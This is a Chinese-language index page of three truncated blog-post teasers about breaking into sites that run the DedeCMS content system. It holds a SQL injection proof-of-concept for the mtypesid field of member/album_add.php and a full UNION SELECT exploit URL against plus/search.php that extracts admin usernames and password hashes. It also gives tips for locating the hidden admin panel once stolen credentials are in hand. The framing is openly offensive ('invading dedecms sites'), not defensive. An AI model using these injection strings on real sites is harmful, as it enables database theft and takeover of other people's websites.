-
dedecms(织梦系统)album_add.php sql注入漏洞
dedecms一处注入,较鸡肋,之前变量覆盖的漏洞太轰动了,所以一直没发出,之前5月份最新版本测试的,目前最新版本应该是没修复的 漏洞需要会员,所以比较鸡肋啦 发表文章处,post表单的mtypesid可以注入 /dedecmsnew/member/album_add.php 注入POC: mtypesid=1′),(“‘”,’0′,’1367930810′,’p’,’0′...阅读全文阅读全文
-
入侵dedecms站 找后台的一些小经验分享
首先: 注入exp 有时候 有些 /plus/目录换成了 /plugins目录 /plugins/search.php?keyword=as&typeArr[111%3D@`\’`) +UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+ from+`%23@__admin`%23@`\’`+]=a /plus/search.php?keyword=as&typeArr[111%3D@`\...阅读全文
-
织梦dedecms管理系统后台查找技巧
有时在通过注射得到织梦程序的管理密码时,却发现找不到后台地址。这样让大家很是蛋疼,下面我来介绍几种织梦系统找后台的方法。 织梦dedecms管理系统后台查找技巧 这个时候大家可以尝试下在地址后面加上: 织梦dedecms管理系统后台查找技巧 1、/include/dialog/select_media.php?f=form1.murl 织梦dedecms管理系统后台查找技巧 2、/include/dialog/select_soft.php 织梦ded...阅读全文